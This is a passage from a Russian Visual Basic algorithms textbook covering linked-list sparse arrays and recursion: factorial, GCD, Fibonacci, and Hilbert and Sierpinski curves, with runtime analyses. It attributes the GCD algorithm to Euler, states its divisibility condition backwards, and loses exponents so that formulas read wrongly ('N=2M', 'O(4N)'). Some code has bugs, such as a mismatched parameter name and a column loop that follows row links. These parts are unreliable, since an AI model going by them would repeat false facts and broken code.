Во многих приложениях требуются большие массивы, которые содержат лишь небольшое число ненулевых элементов. Матрица смежности для авиалиний, например, может содержать 1 в позиции A(I, J) если есть рейс между городами I и J. Многие авиалинии обслуживают сотни городов, но число существующих рейсов намного меньше, чем N2 возможных комбинаций. На рис. 4.8 показана небольшая карта рейсов авиалинии, на которой изображены только 11 существующих рейсов из 100 возможных пар сочетаний городов.
@Рис. 4.7. Программа Poly
====73
@Рис. 4.8. Карта рейсов авиалинии
Можно построить матрицу смежности для этого примера при помощи массива 10 на 10 элементов, но этот массив будет по большей части пустым. Можно избежать потерь памяти, используя для создания разреженного массива указатели. Каждая ячейка содержит указатели на следующий элемент в строке и столбце массива. Это позволяет программе определить положение любого элемента в массиве и обходить элементы в строке или столбце. В зависимости от приложения, может оказаться полезным также добавить обратные указатели. На рис. 4.9 показана разреженная матрица смежности, соответствующая карте рейсов с рис. 4.8.
Чтобы построить разреженный массив в Visual Basic, создайте класс для представления элементов массива. В этом случае, каждая ячейка представляет наличие рейсов между двумя городами. Для представления связи, класс должен содержать переменные с индексами городов, которые связаны между собой. Эти индексы, в сущности, дают номера строк и столбцов ячейки. Каждая ячейка также должна содержать указатели на следующую ячейку в строке и столбце.
Следующий код показывает объявление переменных в классе ConnectionCell:
Public FromCity As Integer ' Строка ячейки.
Public ToCity As Integer ' Столбец ячейки.
Public NextInRow As ConnectionCell
Public NextInCol As ConnectionCell
Строки и столбцы в этом массиве по существу представляют собой связные списки. Как это часто случается со связными списками, с ними проще работать, если они содержат сигнальные метки. Например, переменная RowHead(I) должна содержать сигнальную метку для строки I. Для обхода строки I в массиве можно использовать следующий код:
Private Sub PrintRow(I As Integer)
Dim cell As ConnectionCell
Set Cell = RowHead(I).Next ' Первый элемент данных.
Do While Not (cell Is Nothing)
Print Format$(cell.FromCity) & " -> " & Format$(cell.ToCity)
Set cell = cell.NextInRow
Loop
End Sub
====74
@Рис. 4.9. Разреженная матрица смежности
Индексирование массива
Нормальное индексирование массива типа A(I, J) не будет работать с такими структурами. Можно облегчить индексирование, написав процедуры, которые извлекают и устанавливают значения элементов массива. Если массив представляет матрицу, могут также понадобиться процедуры для сложения, умножения, и других матричных операций.
Специальное значение NoValue представляет пустой элемент массива. Процедура, которая извлекает элементы массива, должна возвращать значение NoValue при попытке получить значение элемента, не содержащегося в массиве. Аналогично, процедура, которая устанавливает значения элементов, должна удалять ячейку из массива, если ее значение установлено в NoValue.
Значение NoValue должно выбираться в зависимости от природы данных приложения. Для матрицы смежности авиалинии пустые ячейки могут иметь значение False. При этом значение A(I, J) может устанавливаться равным True, если существует рейс между городами I и J.
Класс SparseArray определяет процедуру get для свойства Value для возвращения значения элемента в массиве. Процедура начинает с первой ячейки в указанной строке и затем перемещается по связному списку ячеек строки. Как только найдется ячейка с нужным номером столбца, это и будет искомая ячейка. Так как ячейки в списке строки расположены по порядку, процедура может остановиться, если найдется ячейка, номер столбца которой больше искомого.
=====75
Property Get Value(t As Integer, c As Integer) As Variant
Dim cell As SparseArrayCell
Value = NoValue ' Предположим, что мы не найдем элемент.
If r < 1 Or c < 1 Or _
r > NumRows Or c > NumCols _
Then Exit Property
Set cell = RowHead(r).NextInRow ' Пропустить метку.
Do
If cell Is Nothing Then Exit Property ' Не найден.
If cell.Col > c Then Exit Property ' Не найден.
If cell.Col = c Then Exit Do ' Найден.
Set cell = cell.NextInRow
Loop
Value = cell. Data
End Property
Процедура let свойства value присваивает ячейке новое значение. Если новое значение равно NoValue, процедура вызывает для удаления элемента из массива. В противном случае, она ищет требуемое положение элемента в нужной строке. Если элемент уже существует, процедура обновляет его значение. Иначе, она создает новый элемент и добавляет его к списку строки. Затем она добавляет новый элемент в правильное положение в соответствующем списке столбцов.
Property Let Value (r As Integer, c As Integer, new_value As Variant)
Dim i As Integer
Dim found_it As Boolean
Dim cell As SparseArrayCell
Dim nxt As SparseArrayCell
Dim new_cell As SparseArrayCell
' Если value = MoValue, удалить элемент из массива.
If new_value = NoValue Then
RemoveEntry r, c
Exit Property
End If
' Если нужно, добавить строки.
If r > NumRows Then
ReDim Preserve RowHead(1 To r)
' Инициализировать метку для каждой новой строки.
For i = NumRows + 1 To r
Set RowHead(i) = New SparseArrayCell
Next i
End If
' Если нужно, добавить столбцы.
If c > NumCols Then
ReDim Preserve ColHead(1 To c)
' Инициализировать метку для каждой новой строки.
For i = NumCols + 1 To c
Set ColHead(i) = New SparseArrayCell
Next i
NumCols = c
End If
' Попытка найти элемент.
Set cell = RowHead(r)
Set nxt = cell.NextInRow
Do
If nxt Is Nothing Then Exit Do
If nxt.Col >= c Then Exit Do
Set cell = nxt
Set nxt = cell.NextInRow
Loop
' Проверка, найден ли элемент.
If nxt Is Nothing Then
found_it = False
Else
found_it = (nxt.Col = c)
End If
' Если элемент не найден, создать его.
If Not found_it Then
Set new_cell = New SparseArrayCell
' Поместить элемент в список строки.
Set new_cell.NextInRow = nxt
Set cell.NextInRow = new_cell
' Поместить элемент в список столбца.
Set cell = ColHead(c)
Set nxt = cell.NextInCol
Do
If nxt Is Nothing Then Exit Do
If nxt.Col >= c Then Exit Do
Set cell = nxt
Set nxt = cell.NextInRow
Loop
Set new_cell.NextInCol = nxt
Set cell.NextInCol = new_cell
new_cell.Row = r
new_cell.Col = c
' Поместим значение в элемент nxt.
Set nxt = new_cell
End If
' Установим значение.
nxt.Data = new_value
End Property
Программа Sparse, показанная на рис. 4.10, использует классы SparseArray и SparseArrayCell для работы с разреженным массивом. Используя программу, можно устанавливать и извлекать элементы массива. В этой программе значение NoValue равно нулю, поэтому если вы установите значение элемента равным нулю, программа удалит этот элемент из массива.
Очень разреженные массивы
Некоторые массивы содержат так мало непустых элементов, что многие строки и столбцы полностью пусты. В этом случае, лучше хранить заголовки строк и столбцов в связных списках, а не в массивах. Это позволяет программе полностью пропускать пустые строки и столбцы. Заголовки строки и столбцов указывают на связные списки элементов строк и столбцов. На рис. 4.11 показан массив 100 на 100, который содержит всего 7 непустых элементов.
@Рис. 4.10. Программа Sparse
=====76-78
@Рис. 4.11. Очень разреженный массив
Для работы с массивами этого типа можно довольно просто доработать предыдущий код. Большая часть кода остается неизменной, и для элементов массива можно использовать тот же самый класс SparseArray.Тем не менее, вместо хранения меток строк и столбцов в массивах, они записываются в связных списках.
Объекты класса HeaderCell представляют связные списки строк и столбцов. В этом классе определяются переменные, содержащие число строк и столбцов, которые он представляет, сигнальная метка в начале связного списка элементов строк или столбцов, и объект HeaderCell, представляющий следующий заголовок строки или столбца.
Public Number As Integer ' Номер строки или столбца.
Public Sentinel As SparseArrayCell ' Метка для строки или
' столбца.
Public NextHeader As HeaderCell ' Следующая строка или
' столбец.
Например, чтобы обратиться к строке I, нужно вначале просмотреть связный список заголовков HeaderCells строк, пока не найдется заголовок, соответствующий строке I. Затем продолжается работа со строкой I.
Private Sub PrintRow(r As Integer)
Dim row As HeaderCell
Dim cell As SparseArrayCell
' Найти правильный заголовок строки.
Set row = RowHead. NextHeader ' Список первой строки.
Do
If row Is Nothing Then Exit Sub ' Такой строки нет.
If row.Number > r Then Exit Sub ' Такой строки нет.
If row.Number = r Then Exit Do ' Строка найдена.
Set row = row.NextHeader
Loop
' Вывести элементы в строке.
Set cell = row.Sentinel. NextInRow ' Первый элемент в строке.
Do While Not (cell Is Nothing)
Print Format$(cell.FromCity) & " -> " & Format$(cell.ToCity)
Set cell = cell.NextInRow
Loop
End Sub
Резюме
Некоторые программы используют массивы, содержащие только небольшое число значащих элементов. Использование обычных массивов Visual Basic привело бы к большим потерям памяти. Используя треугольные, нерегулярные, разреженные и очень разреженные массивы, вы можете создавать мощные представления массивов, которые требуют намного меньших объемов памяти.
=========80
Глава 5. Рекурсия
Рекурсия — мощный метод программирования, который позволяет разбить задачу на части все меньшего и меньшего размера до тех пор, пока они не станут настолько малы, что решение этих подзадач сведется к набору простых операций.
После того, как вы приобретете опыт применения рекурсии, вы будете обнаруживать ее повсюду. Многие программисты, недавно овладевшие рекурсией, увлекаются, и начинают применять ее в ситуациях, когда она является ненужной, а иногда и вредной.
В первых разделах этой главы обсуждается вычисление факториалов, чисел Фибоначчи, и наибольшего общего делителя. Все эти алгоритмы являются примерами плохого использования рекурсии — нерекурсивные версии этих алгоритмов намного эффективнее. Эти примеры интересны и наглядны, поэтому имеет смысл обсудить их.
Затем, в главе рассматривается несколько примеров, в которых применение рекурсии более уместно. Алгоритмы построения кривых Гильберта и Серпинского используют рекурсию правильно и эффективно.
В последних разделах этой главы объясняется, почему реализацию алгоритмов вычисления факториалов, чисел Фибоначчи, и наибольшего общего делителя лучше осуществлять без применения рекурсии. В этих параграфах объясняется также, когда следует избегать рекурсии, и приводятся способы устранения рекурсии, если это необходимо.
Что такое рекурсия?
Рекурсия происходит, если функция или подпрограмма вызывает сама себя. Прямая рекурсия (direct recursion) выглядит примерно так:
Function Factorial(num As Long) As Long
Factorial = num * Factorial(num - 1)
End Function
В случае косвенной рекурсии (indirect recursion) рекурсивная процедура вызывает другую процедуру, которая, в свою очередь, вызывает первую:
Private Sub Ping(num As Integer)
Pong(num - 1)
End Sub
Private Sub Pong(num As Integer)
Ping(num / 2)
End Sub
===========81
Рекурсия полезна при решении задач, которые естественным образом разбиваются на несколько подзадач, каждая из которых является более простым случаем исходной задачи. Можно представить дерево на рис. 5.1 в виде «ствола», на котором находятся два дерева меньших размеров. Тогда можно написать рекурсивную процедуру для рисования деревьев:
Private Sub DrawTree()
Нарисовать "ствол"
Нарисовать дерево меньшего размера, повернутое на -45 градусов
Нарисовать дерево меньшего размера, повернутое на 45 градусов
End Sub
Хотя рекурсия и может упростить понимание некоторых проблем, люди обычно не мыслят рекурсивно. Они обычно стремятся разбить сложные задачи на задачи меньшего объема, которые могут быть выполнены последовательно одна за другой до полного завершения. Например, чтобы покрасить изгородь, можно начать с ее левого края и продолжать двигаться вправо до завершения. Вероятно, во время выполнения подобной задачи вы не думаете о возможности рекурсивной окраски — вначале левой половины изгороди, а затем рекурсивно — правой.
Для того чтобы думать рекурсивно, нужно разбить задачу на подзадачи, которые затем можно разбить на подзадачи меньшего размера. В какойто момент подзадачи становятся настолько простыми, что могут быть выполнены непосредственно. Когда завершится выполнение подзадач, большие подзадачи, которые из них составлены, также будут выполнены. Исходная задача окажется выполнена, когда будут все выполнены образующие ее подзадачи.
Рекурсивное вычисление факториалов
Факториал числа N записывается как N! (произносится «эн факториал»). По определению, 0! равно 1. Остальные значения определяются формулой:
N! = N * (N - 1) * (N - 2) * ... * 2 * 1
Как уже упоминалось в 1 главе, эта функция чрезвычайно быстро растет с увеличением N. В табл. 5.1 приведены 10 первых значений функции факториала.
Можно также определить функцию факториала рекурсивно:
0! = 1
N! = N * (N - 1)! для N > 0.
@Рис. 5.1. Дерево, составленное из двух деревьев меньшего размера
===========82
@Таблица 5.1. Значения функции факториала
Легко написать на основе этого определения рекурсивную функцию:
Public Function Factorial(num As Integer) As Integer
If num <= 0 Then
Factorial = 1
Else
Factorial = num * Factorial(num - 1)
End If
End Function
Вначале эта функция проверяет, что число меньше или равно 0. Факториал для чисел меньше нуля не определен, но это условие проверяется для подстраховки. Если бы функция проверяла только условие равенства числа нулю, то для отрицательных чисел рекурсия была бы бесконечной.
Если входное значение меньше или равно 0, функция возвращает значение 1. В остальных случаях, значение функции равно произведению входного значения на факториал от входного значения, уменьшенного на единицу.
То, что эта рекурсивная функция в конце концов остановится, гарантируется двумя фактами. Вопервых, при каждом последующем вызове, значение параметра num уменьшается на единицу. Вовторых, значение num ограничено снизу нулем. Когда num становится равным 0, функция останавливает рекурсию. Условие, например, в данном случае условие num<=0, называется или условием остановки рекурсии (base case или stopping case).
При каждом вызове подпрограммы, система сохраняет ряд параметров в системном стеке, как описывалось в 3 главе. Так как этот стек играет важную роль, иногда его называют просто стеком. Если рекурсивная функция вызовет себя слишком много раз, она может исчерпать стековое пространство и аварийно завершить работу с ошибкой «Out of stack space».
Число раз, которое функция может вызвать сама себя до того, как использует все стековое пространство, зависит от объема установленной на компьютере памяти и количества данных, помещаемых программой в стек. В одном из тестов, программа исчерпала стековое пространство после 452 рекурсивных вызовов. После изменения рекурсивной функции таким образом, чтобы она определяла 10 локальных переменных при каждом вызове, программа могла вызвать себя только 271 раз.
Анализ времени выполнения программы
Функции факториала требуется единственный аргумент: число, факториал от которого требуется вычислить. Анализ вычислительной сложности алгоритма обычно исследует зависимость времени выполнения программы как функции от размерности (size) задачи или числа входных значений (number of inputs). Поскольку в данном случае входное значение всего одно, такие расчеты могли бы показаться немного странными.
========83
Поэтому, алгоритмы с единственным входным параметром обычно оцениваются через число битов, необходимых для хранения входного значения, а не число входных значений. В некотором смысле, это и есть размер входа, так как столько бит требуется для того, чтобы записать входное значение. Тем не менее, это не очень наглядный способ представления этой задачи. Кроме того, теоретически компьютер мог бы записать входное значение N в log2(N) бит, но в действительности вероятнее всего N занимает фиксированное число битов. Например, все числа формата long занимают 32 бита.
Поэтому в этой главе алгоритмы этого типа анализируются на основе значения входа, а не его размерности. Если вы хотите переписать результаты в терминах размерности входа, вы можете это сделать, воспользовавшись тем, что N=2M, где М — число битов, необходимое для записи N. Если время выполнения алгоритма порядка O(N2) в терминах входного значения N, то оно составит порядка O((22M)2) = O(22*M) = O((22)M) = O(4M) в терминах размерности входа M.
Функции порядка O(N) растут довольно медленно, поэтому можно ожидать от этого алгоритма хорошей производительности. Так оно и есть. Эта функция приводит к проблемам только при переполнении стека после множества рекурсивных вызовов, или когда значение N! становится слишком большим и не помещается в формат целого числа, вызывая ошибку переполнения.
Так как N! растет очень быстро, переполнение наступает раньше, если только стек не используется интенсивно для других целей. При использовании данных целого типа, переполнение наступает для 8!, поскольку 8! = 40.320, что больше, чем наибольшее целое число 32.767. Для того чтобы программа могла вычислять приближенные значения факториала больших чисел, можно изменить функцию, используя вместо целых чисел значения типа double. Тогда максимальное число, которое сможет вычислить алгоритм, будет равно 170! = 7,257E+306.
Программа Facto демонстрирует рекурсивную функцию факториала. Введите значение и нажмите на кнопку Go, чтобы вычислить его факториал.
Рекурсивное вычисление наибольшего общего делителя
Наибольшим общим делителем (greatest common divisor, GCD) двух чисел называется наибольшее целое, на которое делятся два числа без остатка. Например, наибольший общий делитель чисел 12 и 9 равен 3. Два числа называются взаимно простыми (relatively prime), если их наибольший общий делитель равен 1.
Математик Эйлер, живший в восемнадцатом веке, обнаружил интересный факт:
Если A нацело делится на B, то GCD(A, B) = A.
Иначе GCD(A, B) = GCD(B Mod A, A).
Этот факт можно использовать для быстрого вычисления наибольшего общего делителя. Например:
GCD(9, 12) = GCD(12 Mod 9, 9)
= GCD(3, 9)
= 3
========84
На каждом шаге числа становятся все меньше, так как 1<=B Mod A<A, если A не делится на B нацело. По мере уменьшения аргументов, в конце концов, A примет значение 1. Так как любое число делится на 1 нацело, на этом шаге рекурсия остановится. Таким образом, в какой то момент B разделится на A нацело, и работа процедуры завершится.
Открытие Эйлера закономерным образом приводит к рекурсивному алгоритму вычисления наибольшего общего делителя:
public Function GCD(A As Integer, B As Integer) As Integer
If B Mod A = 0 Then ' Делится ли B на A нацело?
GCD = A ' Да. Процедура завершена.
Else
GCD = GCD(B Mod A, A) ' Нет. Рекурсия.
End If
End Function
Анализ времени выполнения программы
Чтобы проанализировать время выполнения этого алгоритма, необходимо определить, насколько быстро убывает переменная A. Так как функция останавливается, когда A доходит до значения 1, то скорость уменьшения A дает верхнюю границу оценки времени выполнения алгоритма. Оказывается, при каждом втором вызове функции GCD, параметр A уменьшается, по крайней мере, в 2 раза.
Допустим, A < B. Это условие всегда выполняется при первом вызове функции GCD. Если B Mod A <= A/2, то при следующем вызове функции GCD первый параметр уменьшится, по крайней мере, в 2 раза, и доказательство закончено.
Предположим обратное. Допустим, B Mod A > A / 2. Первым рекурсивным вызовом функции GCD будет GCD(B Mod A, A).
Подстановка в функцию значения B Mod A и A вместо A и B дает следующий рекурсивный вызов GCD(B Mod A, A).
Но мы предположили, что B Mod A > A / 2. Тогда B Mod A разделится на A только один раз, с остатком A – (B Mod A). Так как B Mod A больше, чем A / 2, то A – (B Mod A) должно быть меньше, чем A / 2. Значит, первый параметр второго рекурсивного вызова функции GCD меньше, чем A / 2, что и требовалось доказать.
Предположим теперь, что N — это исходное значение параметра A. После двух вызовов функции GCD, значение параметра A должно уменьшится, по крайней мере, до N / 2. После четырех вызовов, это значение будет не больше, чем (N / 2) / 2 = N / 4. После шести вызовов, значение не будет превосходить (N / 4) / 2 = N / 8. В общем случае, после 2 * K вызовов функции GCD, значение параметра A будет не больше, чем N / 2K.
Поскольку алгоритм должен остановиться, когда значение параметра A дойдет до 1, он может продолжать работу только до тех, пока не выполняется равенство N/2K=1. Это происходит, когда N=2K или когда K=log2(N). Так как алгоритм выполняется за 2*K шагов это означает, что алгоритм остановится не более, чем через 2*log2(N) шагов. С точностью до постоянного множителя, это означает, что алгоритм выполняется за время порядка O(log(N)).
=======85
Этот алгоритм — один из множества рекурсивных алгоритмов, которые выполняются за время порядка O(log(N)). При выполнении фиксированного числа шагов, в данном случае 2, размер задачи уменьшается вдвое. В общем случае, если размер задачи уменьшается, по меньшей мере, в D раз после каждых S шагов, то задача потребует S*logD(N) шагов.
Поскольку при оценке по порядку величины можно игнорировать постоянные множители и основания логарифмов, то любой алгоритм, который выполняется за время S*logD(N), будет алгоритмом порядка O(log(N)). Это не обязательно означает, что этими постоянными можно полностью пренебречь при реализации алгоритма. Алгоритм, который уменьшает размер задачи при каждом шаге в 10 раз, вероятно, будет быстрее, чем алгоритм, который уменьшает размер задачи вдвое через каждые 5 шагов. Тем не менее, оба эти алгоритма имеют время выполнения порядка O(log(N)).
Алгоритмы порядка O(log(N)) обычно выполняются очень быстро, и алгоритм нахождения наибольшего общего делителя не является исключением из этого правила. Например, чтобы найти, что наибольший общий делитель чисел 1.736.751.235 и 2.135.723.523 равен 71, функция вызывается всего 17 раз. Фактически, алгоритм практически мгновенно вычисляет значения, не превышающие максимального значения числа в формате long — 2.147.483.647. Функция Visual Basic Mod не может оперировать значениями, большими этого, поэтому это практический предел для данной реализации алгоритма.
Программа GCD использует этот алгоритм для рекурсивного вычисления наибольшего общего делителя. Введите значения для A и B, затем нажмите на кнопку Go, и программа вычислит наибольший общий делитель этих двух чисел.
Рекурсивное вычисление чисел Фибоначчи
Можно рекурсивно определить числа Фибоначчи (Fibonacci numbers) при помощи уравнений:
Fib(0) = 0
Fib(1) = 1
Fib(N) = Fib(N - 1) + Fib(N - 2) для N > 1.
Третье уравнение рекурсивно дважды вызывает функцию Fib, один раз с входным значением N-1, а другой — со значением N-2. Это определяет необходимость 2 условий остановки рекурсии: Fib(0)=0 и Fib(1)=1. Если задать только одно из них, рекурсия может оказаться бесконечной. Например, если задать только Fib(0)=0, то значение Fib(2) могло бы вычисляться следующим образом:
Fib(2) = Fib(1) + Fib(0)
= [Fib(0) + Fib(-1)] + 0
= 0 + [Fib(-2) + Fib(-3)]
= [Fib(-3) + Fib(-4)] + [Fib(-4) + Fib(-5)]
И т.д.
Это определение чисел Фибоначчи легко преобразовать в рекурсивную функцию:
Public Function Fib(num As Integer) As Integer
If num <= 1 Then
Fib = num
Else
Fib = Fib(num – 1) + Fib(num - 2)
End If
End Function
=========86
Анализ времени выполнения программы
Анализ этого алгоритма достаточно сложен. Вопервых, определим, сколько раз выполняется одно из условий остановки num <=1. Пусть G(N) — количество раз, которое алгоритм достигает условия остановки для входа N. Если N <= 1, то функция достигает условия остановки один раз и не требует рекурсии.
Если N > 1, то функция рекурсивно вычисляет Fib(N-1) и Fib(N-2), и завершает работу. При первом вызове функции, условие остановки не выполняется — оно достигается только в следующих, рекурсивных вызовах. Полное число выполнения условия остановки для входного значения N, складывается из числа раз, которое оно выполняется для значения N-1 и числа раз, которое оно выполнялось для значения N-2. Все это можно записать так:
G(0) = 1
G(1) = 1
G(N) = G(N - 1) + G(N - 2) для N > 1.
Это рекурсивное определение очень похоже на определение чисел Фибоначчи. В табл. 5.2 приведены некоторые значения функций G(N) и Fib(N). Легко увидеть, что G(N) = Fib(N+1).
Теперь рассмотрим, сколько раз алгоритм достигает рекурсивного шага. Если N<=1, функция не достигает этого шага. При N>1, функция достигает этого шага 1 раз и затем рекурсивно вычисляет Fib(n-1) и Fib(N-2). Пусть H(N) — число раз, которое алгоритм достигает рекурсивного шага для входа N. Тогда H(N)=1+H(N-1)+H(N-2). Уравнения, определяющие H(N):
H(0) = 0
H(1) = 0
H(N) = 1 + H(N - 1) + H(N - 2) для N > 1.
В табл. 5.3 показаны некоторые значения для функций Fib(N) и H(N). Можно увидеть, что H(N)=Fib(N+1)-1.
@Таблица 5.2. Значения чисел Фибоначчи и функции G(N)
======87
@Таблица 5.3. Значения чисел Фибоначчи и функции H(N)
Объединяя результаты для G(N) и H(N), получаем полное время выполнения для алгоритма:
Время выполнения = G(N) + H(N)
= Fib(N + 1) + Fib(N + 1) - 1
= 2 * Fib(N + 1) - 1
Поскольку Fib(N + 1) >= Fib(N) для всех значений N, то:
Время выполнения >= 2 * Fib(N) - 1
С точностью до порядка это составит O(Fib(N)). Интересно, что эта функция не только рекурсивная, но она также используется для оценки времени ее выполнения.
Чтобы помочь вам представить скорость роста функции Фибоначчи, можно показать, что Fib(M)>M-2 где — константа, примерно равная 1,6. Это означает, что время выполнения не меньше, чем значение экспоненциальной функции O(M). Как и другие экспоненциальные функции, эта функция растет быстрее, чем полиномиальные функции, но медленнее, чем функция факториала.
Поскольку время выполнения растет очень быстро, этот алгоритм довольно медленно выполняется для больших входных значений. Фактически, настолько медленно, что на практике почти невозможно вычислить значения функции Fib(N) для N, которые намного больше 30. В табл. 5.4 показано время выполнения для этого алгоритма на компьютере с процессором Pentium с тактовой частотой 90 МГц при разных входных значениях.
Программа Fibo использует этот рекурсивный алгоритм для вычисления чисел Фибоначчи. Введите целое число и нажмите на кнопку Go для вычисления чисел Фибоначчи. Начните с небольших чисел, пока не оцените, насколько быстро ваш компьютер может выполнять эти вычисления.
Рекурсивное построение кривых Гильберта
Кривые Гильберта (Hilbert curves) — это самоподобные (selfsimilar) кривые, которые обычно определяются при помощи рекурсии. На рис. 5.2. показаны кривые Гильберта с 1, 2 или 3 порядка.
@Таблица 5.4. Время выполнения программы Fibonacci
=====88
@Рис. 5.2. Кривые Гильберта
Кривая Гильберта, как и любая другая самоподобная кривая, создается разбиением большой кривой на меньшие части. Затем вы можете использовать эту же кривую, после изменения размера и поворота, для построения этих частей. Эти части можно разбить на более мелкие части, и так далее, пока процесс не достигнет нужной глубины рекурсии. Порядок кривой определяется как максимальная глубина рекурсии, которой достигает процедура.
Процедура Hilbert управляет глубиной рекурсии, используя соответствующий параметр. При каждом рекурсивном вызове, процедура уменьшает параметр глубины рекурсии на единицу. Если процедура вызывается с глубиной рекурсии, равной 1, она рисует простую кривую 1 порядка, показанную на рис. 5.2 слева и завершает работу. Это условие остановки рекурсии.
Например, кривая Гильберта 2 порядка состоит из четырех кривых Гильберта 1 порядка. Аналогично, кривая Гильберта 3 порядка состоит из четырех кривых 2 порядка, каждая из которых состоит из четырех кривых 1 порядка. На рис. 5.3 показаны кривые Гильберта 2 и 3 порядка. Меньшие кривые, из которых построены кривые большего размера, выделены полужирными линиями.
Следующий код строит кривую Гильберта 1 порядка:
Line -Step (Length, 0)
Line -Step (0, Length)
Line -Step (-Length, 0)
Предполагается, что рисование начинается с верхнего левого угла области и что Length — это заданная длина каждого отрезка линий.
Можно набросать черновик метода, рисующего кривые Гильберта более высоких порядков:
Private Sub Hilbert(Depth As Integer)
If Depth = 1 Then
Нарисовать кривую Гильберта 1 порядка
Else
Нарисовать и соединить 4 кривые порядка (Depth - 1)
End If
End Sub
====89
@Рис. 5.3. Кривые Гильберта, образованные меньшими кривыми
Этот метод требует небольшого усложнения для определения направления рисования кривых. Это требуется для того, чтобы выбрать тип используемых кривых Гильберта.
Эту информацию можно передать процедуре при помощи параметров Dx и Dy для определения направления вывода первой линии в кривой. Для кривой 1 порядка, процедура рисует первую линию при помощи функции Line-Step(Dx, Dy). Если кривая имеет более высокий порядок, процедура соединяет первые две подкривых, используя функцию Line-Step(Dx, Dy). В любом случае, процедура может использовать параметры Dx и Dy для выбора направления, в котором она должна рисовать линии, образующие кривую.
Код на языке Visual Basic для рисования кривых Гильберта короткий, но сложный. Вам может потребоваться несколько раз пройти его в отладчике для кривых 1 и 2 порядка, чтобы увидеть, как изменяются параметры Dx и Dy, при построении различных частей кривой.
Private Sub Hilbert(depth As Integer, Dx As Single, Dy As Single)
If depth > 1 Then Hilbert depth - 1, Dy, Dx
HilbertPicture.Line -Step(Dx, Dy)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
HilbertPicture.Line -Step(Dy, Dx)
If depth > 1 Then Hilbert depth - 1, Dx, Dy
HilbertPicture.Line -Step(-Dx, -Dy)
If depth > 1 Then Hilbert depth - 1, -Dy, -Dx
End Sub
Анализ времени выполнения программы
Чтобы проанализировать время выполнения этой процедуры, вы можете определить число вызовов процедуры Hilbert. При каждой рекурсии она вызывает себя четыре раза. Если T(N) — это число вызовов процедуры, когда она вызывается с глубиной рекурсии N, то:
T(1) = 1
T(N) = 1 + 4 * T(N - 1) для N > 1.
Если раскрыть определение T(N), получим:
T(N) = 1 + 4 * T(N - 1)
= 1 + 4 *(1 + 4 * T(N - 2))
= 1 + 4 + 16 * T(N - 2)
= 1 + 4 + 16 * (1 + 4 * T(N - 3))
= 1 + 4 + 16 + 64 * T(N - 3)
= ...
= 40 + 41 + 42 + 43 + ... + 4K * T(N - K)
Раскрыв это уравнение до тех пор, пока не будет выполнено условие остановки рекурсии T(1)=1, получим:
T(N) = 40 + 41 + 42 + 43 + ... + 4N-1
Это уравнение можно упростить, воспользовавшись соотношением:
X0 + X1 + X2 + X3 + ... + XM = (XM+1 - 1) / (X - 1)
После преобразования, уравнение приводится к виду:
T(N) = (4(N-1)+1 - 1) / (4 - 1)
= (4N - 1) / 3
=====90
С точностью до постоянных, эта процедура выполняется за время порядка O(4N). В табл. 5.5 приведены несколько первых значений функции времени выполнения. Если вы внимательно посмотрите на эти числа, то увидите, что они соответствуют рекурсивному определению.
Этот алгоритм является типичным примером рекурсивного алгоритма, который выполняется за время порядка O(CN), где C — некоторая постоянная. При каждом вызове подпрограммы Hilbert, она увеличивает размерность задачи в 4 раза. В общем случае, если при каждом выполнении некоторого числа шагов алгоритма размер задачи увеличивается не менее, чем в C раз, то время выполнения алгоритма будет порядка O(CN).
Это поведение противоположно поведению алгоритма поиска наибольшего общего делителя. Процедура GCD уменьшает размерность задачи в 2 раза при каждом втором своем вызове, и поэтому время ее выполнения порядка O(log(N)). Процедура построения кривых Гильберта увеличивает размер задачи в 4 раза при каждом своем вызове, поэтому время ее выполнения порядка O(4N).
Функция (4N-1)/3 — это экспоненциальная функция, которая растет очень быстро. Фактически, она растет настолько быстро, что вы можете предположить, что это не слишком эффективный алгоритм. В действительности работа этого алгоритма занимает много времени, но есть две причины, по которым это не так уж и плохо.
Во-первых, ни один алгоритм для построения кривых Гильберта не может быть намного быстрее. Кривые Гильберта содержат множество отрезков линий, и любой рисующий их алгоритм будет требовать достаточно много времени. При каждом вызове процедуры Hilbert, она рисует три линии. Пусть L(N) — суммарное число линий, из которых состоит кривая Гильберта порядка N. Тогда L(N) = 3 * T(N) = 4N - 1, поэтому L(N) также порядка O(4N). Любой алгоритм, рисующий кривые Гильберта, должен вывести O(4N) линий, выполнив при этом O(4N) шагов. Существуют другие алгоритмы построения кривых Гильберта, но они занимают почти столько же времени, сколько и этот алгоритм.
@Таблица 5.5. Число рекурсивных вызовов подпрограммы Hilbert
=====91
Второй факт, который показывает, что этот алгоритм не так уж плох, заключается в том, что кривые Гильберта 9 порядка содержат так много линий, что экран большинства компьютерных мониторов при этом оказывается полностью закрашенным. Это неудивительно, так как эта кривая содержит 262.143 отрезков линий. Это означает, что вам вероятно никогда не понадобится выводить на экран кривые Гильберта 9 или более высоких порядков. На какомто порядке вы столкнетесь с ограничениями языка Visual Basic и вашего компьютера, но, скорее всего, вы еще раньше будете ограничены максимальным разрешением экрана.
Программа Hilbert, показанная на рис. 5.4, использует этот рекурсивный алгоритм для рисования кривых Гильберта. При выполнении программы не задавайте слишком большую глубину рекурсии (больше 6) до тех пор, пока вы не определите, насколько быстро выполняется эта программа на вашем компьютере.
Рекурсивное построение кривых Серпинского
Как и кривые Гильберта, кривые Серпинского (Sierpinski curves) — это самоподобные кривые, которые обычно определяются рекурсивно. На рис. 5.5 показаны кривые Серпинского 1, 2 и 3 порядка.
Алгоритм построения кривых Гильберта использует всего одну подпрограмму для рисования кривых. Кривые Серпинского проще рисовать, используя четыре отдельных процедуры, которые работают совместно. Эти процедуры называются SierpA, SierpB, SierpC и SierpD. Это процедуры с косвенной рекурсией — каждая процедура вызывает другие, которые затем вызывают первоначальную процедуру. Они рисуют верхнюю, левую, нижнюю и правую части кривой Серпинского, соответственно.
На рис. 5.6 показано, как эти процедуры работают совместно, образуя кривую Серпинского 1 порядка. Подкривые изображены стрелками, чтобы показать направление, в котором они рисуются. Отрезки, соединяющие четыре подкривые, нарисованы пунктирными линиями.
@Рис. 5.4. Программа Hilbert
=====92
@Рис. 5.5. Кривые Серпинского
Каждая из четырех основных кривых состоит из диагонального отрезка, затем вертикального или горизонтального отрезка, и еще одного диагонального отрезка. Если глубина рекурсии больше единицы, каждая из этих кривых разбивается на меньшие части. Это осуществляется разбиением каждого из двух диагональных отрезков на две подкривые.
